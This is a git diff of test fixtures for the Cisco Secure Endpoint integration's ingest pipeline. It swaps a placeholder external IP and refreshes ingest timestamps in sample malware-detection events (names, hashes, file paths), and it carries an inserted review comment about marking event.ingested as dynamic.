@@ -3468,8 +3468,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174590339Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337280500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3491,7 +3491,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3541,7 +3541,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3558,8 +3558,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174592404Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337286500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3581,7 +3581,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3631,7 +3631,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3644,8 +3644,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174594469Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337292400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3667,7 +3667,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3717,7 +3717,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3734,8 +3734,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174596504Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337298300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3757,7 +3757,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3807,7 +3807,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3820,8 +3820,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174598519Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337304300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3843,7 +3843,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log index f31bf18a23a..9e04010b548 100644 
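Review bot: The `event.ingested` values rewritten in the `@@ -3820,8 +3820,8 @@` hunk (`- "ingested": "2021-09-30T00:14:30.174598519Z"` → `+ "ingested": "2021-12-09T13:35:36.337304300Z"`) carry no test value and will change on every regeneration of this expected file, so each future fixture touch will produce the same noise on top of the real `external_ip` change. If the pipeline test config for this data stream does not already declare it, marking `event.ingested` as a dynamic field there (for elastic-package, `dynamic_fields:` with `event.ingested: ".*"`) would keep these fixtures stable; this is hedged, since that config file is not part of this diff. The `external_ip` replacement itself is applied consistently to `computer.external_ip`, `related.ip`, and the embedded `event.original` string in every hunk shown, so the expected output stays self-consistent. The enclosing event objects begin and end outside these hunks.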
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log 
@@ -1,100 +1,100 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} 